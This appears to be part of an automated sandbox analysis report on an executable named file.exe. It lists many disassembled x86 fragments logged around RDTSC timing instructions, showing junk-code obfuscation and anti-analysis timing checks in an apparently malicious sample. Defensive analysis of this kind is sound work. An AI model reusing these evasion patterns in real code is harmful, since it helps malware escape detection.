                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC9B0F second address: FC9B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jmp 00007F5AD8CCF43Ah 0x0000000b nop 0x0000000c mov edi, 66F2B8CDh 0x00000011 push 00000000h 0x00000013 mov edi, dword ptr [ebp+122D248Dh] 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c pushad 0x0000001d pushad 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 jmp 00007F5AD8CCF444h 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 push esi 0x00000029 pop esi 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC9B4D second address: FC9B51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCBD25 second address: FCBDE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF444h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F5AD8CCF442h 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007F5AD8CCF43Fh 0x00000015 nop 0x00000016 sub dword ptr [ebp+12461B47h], edi 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebp 0x00000021 call 00007F5AD8CCF438h 0x00000026 pop ebp 0x00000027 mov dword ptr [esp+04h], ebp 0x0000002b add dword ptr [esp+04h], 0000001Ah 0x00000033 inc ebp 0x00000034 push ebp 0x00000035 ret 0x00000036 pop ebp 0x00000037 ret 0x00000038 mov dword ptr [ebp+124574BDh], edx 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push esi 0x00000043 call 00007F5AD8CCF438h 0x00000048 pop esi 0x00000049 mov dword ptr [esp+04h], esi 0x0000004d add dword ptr [esp+04h], 00000015h 0x00000055 inc esi 0x00000056 push esi 0x00000057 ret 0x00000058 pop esi 0x00000059 ret 0x0000005a xchg eax, esi 0x0000005b jnp 00007F5AD8CCF449h 0x00000061 jmp 00007F5AD8CCF443h 0x00000066 push eax 0x00000067 push edi 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007F5AD8CCF443h 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC112C second address: FC1130 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4B97 second address: FC4BA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5AD8CCF436h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC6C07 second address: FC6CC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCD673h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F5AD8CCD668h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov bx, 30C0h 0x00000028 push dword ptr fs:[00000000h] 0x0000002f mov bx, di 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 pushad 0x0000003a mov ecx, edx 0x0000003c popad 0x0000003d mov eax, dword ptr [ebp+122D0909h] 0x00000043 call 00007F5AD8CCD66Ah 0x00000048 or bh, 00000062h 0x0000004b pop edi 0x0000004c push FFFFFFFFh 0x0000004e push 00000000h 0x00000050 push edi 0x00000051 call 00007F5AD8CCD668h 0x00000056 pop edi 0x00000057 mov dword ptr [esp+04h], edi 0x0000005b add dword ptr [esp+04h], 00000016h 0x00000063 inc edi 0x00000064 push edi 0x00000065 ret 0x00000066 pop edi 0x00000067 ret 0x00000068 mov di, 3581h 0x0000006c nop 0x0000006d jmp 00007F5AD8CCD673h 0x00000072 push eax 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 jmp 00007F5AD8CCD678h 0x0000007b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC7C1C second address: FC7CB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF43Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jmp 00007F5AD8CCF441h 0x00000012 pop ecx 0x00000013 pop edx 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F5AD8CCF438h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f mov edi, 28D47587h 0x00000034 push dword ptr fs:[00000000h] 0x0000003b mov ebx, dword ptr [ebp+122D1B36h] 0x00000041 mov dword ptr fs:[00000000h], esp 0x00000048 jl 00007F5AD8CCF43Eh 0x0000004e pushad 0x0000004f mov ecx, dword ptr [ebp+122DB817h] 0x00000055 popad 0x00000056 mov eax, dword ptr [ebp+122D0B05h] 0x0000005c sub dword ptr [ebp+122D303Ah], esi 0x00000062 push FFFFFFFFh 0x00000064 sbb ebx, 05F53F00h 0x0000006a push eax 0x0000006b pushad 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F5AD8CCF442h 0x00000073 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1130 second address: FC1154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F5AD8CCD676h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCE470 second address: FCE4D9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jbe 00007F5AD8CCF436h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jmp 00007F5AD8CCF449h 0x00000012 push 00000000h 0x00000014 mov ebx, dword ptr [ebp+122D3984h] 0x0000001a mov edi, dword ptr [ebp+122D37B4h] 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push ebp 0x00000025 call 00007F5AD8CCF438h 0x0000002a pop ebp 0x0000002b mov dword ptr [esp+04h], ebp 0x0000002f add dword ptr [esp+04h], 0000001Ch 0x00000037 inc ebp 0x00000038 push ebp 0x00000039 ret 0x0000003a pop ebp 0x0000003b ret 0x0000003c mov bh, al 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 push esi 0x00000043 pop esi 0x00000044 jng 00007F5AD8CCF436h 0x0000004a popad 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC7CB2 second address: FC7CB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4C43 second address: FC4C4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCF384 second address: FCF39E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5AD8CCD676h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCBFE8 second address: FCC00A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jmp 00007F5AD8CCF445h 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCF39E second address: FCF3E2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ebx, 3700D010h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F5AD8CCD668h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D35D2h], edx 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+1245A28Fh], esi 0x0000003a xchg eax, esi 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCF3E2 second address: FCF3E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCF3E6 second address: FCF409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5AD8CCD66Eh 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 jp 00007F5AD8CCD66Eh 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD041C second address: FD042B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF43Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD042B second address: FD0440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007F5AD8CCD666h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD0440 second address: FD0446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD156A second address: FD156E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD156E second address: FD158B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5AD8CCF445h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCE60C second address: FCE68A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F5AD8CCD668h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 mov edi, eax 0x00000025 push dword ptr fs:[00000000h] 0x0000002c add dword ptr [ebp+122D32C7h], eax 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 mov ebx, dword ptr [ebp+122D1B75h] 0x0000003f mov eax, dword ptr [ebp+122D02ADh] 0x00000045 mov ebx, edx 0x00000047 push FFFFFFFFh 0x00000049 push 00000000h 0x0000004b push eax 0x0000004c call 00007F5AD8CCD668h 0x00000051 pop eax 0x00000052 mov dword ptr [esp+04h], eax 0x00000056 add dword ptr [esp+04h], 00000014h 0x0000005e inc eax 0x0000005f push eax 0x00000060 ret 0x00000061 pop eax 0x00000062 ret 0x00000063 movsx ebx, dx 0x00000066 push eax 0x00000067 jo 00007F5AD8CCD678h 0x0000006d push eax 0x0000006e push edx 0x0000006f jnl 00007F5AD8CCD666h 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD36CD second address: FD375A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5AD8CCF436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F5AD8CCF447h 0x00000010 pop eax 0x00000011 popad 0x00000012 push eax 0x00000013 jmp 00007F5AD8CCF43Fh 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007F5AD8CCF438h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 00000014h 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ecx 0x00000038 call 00007F5AD8CCF438h 0x0000003d pop ecx 0x0000003e mov dword ptr [esp+04h], ecx 0x00000042 add dword ptr [esp+04h], 00000019h 0x0000004a inc ecx 0x0000004b push ecx 0x0000004c ret 0x0000004d pop ecx 0x0000004e ret 0x0000004f jmp 00007F5AD8CCF43Eh 0x00000054 push 00000000h 0x00000056 mov bx, cx 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD375A second address: FD3765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5AD8CCD666h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD471B second address: FD4734 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF440h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD06DB second address: FD06F1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F5AD8CCD668h 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD06F1 second address: FD06F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD06F5 second address: FD06FF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5AD8CCD666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD1747 second address: FD1758 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jbe 00007F5AD8CCF450h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6C96 second address: FD6C9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD2787 second address: FD27A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5AD8CCF447h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD27A2 second address: FD27BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jbe 00007F5AD8CCD67Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5AD8CCD66Ah 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD388A second address: FD3890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD394C second address: FD3950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD3950 second address: FD3961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F5AD8CCF436h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD3961 second address: FD3965 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD4966 second address: FD496A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD496A second address: FD496E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD496E second address: FD4974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD4974 second address: FD4979 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDE5DD second address: FDE5E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDE5E1 second address: FDE5F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jl 00007F5AD8CCD666h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDE5F2 second address: FDE5FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDE5FB second address: FDE5FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE394F second address: FE3955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE3A38 second address: FE3A80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F5AD8CCD677h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jnp 00007F5AD8CCD66Ah 0x00000017 push esi 0x00000018 push eax 0x00000019 pop eax 0x0000001a pop esi 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5AD8CCD677h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE3A80 second address: E01BFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF441h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F5AD8CCF43Bh 0x00000012 pop eax 0x00000013 jne 00007F5AD8CCF440h 0x00000019 push dword ptr [ebp+122D00B9h] 0x0000001f cld 0x00000020 call dword ptr [ebp+122D178Ch] 0x00000026 pushad 0x00000027 jmp 00007F5AD8CCF43Dh 0x0000002c xor eax, eax 0x0000002e pushad 0x0000002f sbb di, CCF1h 0x00000034 cmc 0x00000035 popad 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a pushad 0x0000003b push ecx 0x0000003c pop edx 0x0000003d mov dword ptr [ebp+122D32C7h], edx 0x00000043 popad 0x00000044 mov dword ptr [ebp+122D3890h], eax 0x0000004a mov dword ptr [ebp+122D32C7h], esi 0x00000050 jns 00007F5AD8CCF43Ch 0x00000056 mov esi, 0000003Ch 0x0000005b jbe 00007F5AD8CCF442h 0x00000061 jnl 00007F5AD8CCF43Ch 0x00000067 add esi, dword ptr [esp+24h] 0x0000006b mov dword ptr [ebp+122D32C7h], edi 0x00000071 lodsw 0x00000073 cmc 0x00000074 add eax, dword ptr [esp+24h] 0x00000078 cmc 0x00000079 mov ebx, dword ptr [esp+24h] 0x0000007d stc 0x0000007e mov dword ptr [ebp+122D2466h], edx 0x00000084 push eax 0x00000085 pushad 0x00000086 push eax 0x00000087 push edx 0x00000088 jmp 00007F5AD8CCF447h 0x0000008d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7688D second address: F768A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AD8CCD670h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE8B5E second address: FE8B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AD8CCF443h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE940A second address: FE9410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE9410 second address: FE9421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5AD8CCF436h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE9421 second address: FE9425 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE9716 second address: FE971A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE971A second address: FE9743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F5AD8CCD668h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jnl 00007F5AD8CCD66Eh 0x00000018 push edx 0x00000019 jnl 00007F5AD8CCD666h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE9743 second address: FE9748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE9748 second address: FE9755 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F5AD8CCD666h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE98DA second address: FE98EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F5AD8CCF436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE98EE second address: FE98F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE9B8B second address: FE9BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AD8CCF444h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE287 second address: FEE28D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE28D second address: FEE291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE291 second address: FEE29B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5AD8CCD666h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE431 second address: FEE43D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F5AD8CCF436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE43D second address: FEE44D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE44D second address: FEE453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE453 second address: FEE46F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCD678h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE46F second address: FEE496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F5AD8CCF454h 0x0000000e push ecx 0x0000000f jmp 00007F5AD8CCF446h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEEA3A second address: FEEA84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCD673h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F5AD8CCD66Ch 0x0000000e jnc 00007F5AD8CCD67Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 js 00007F5AD8CCD666h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEEA84 second address: FEEA88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEEA88 second address: FEEA8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
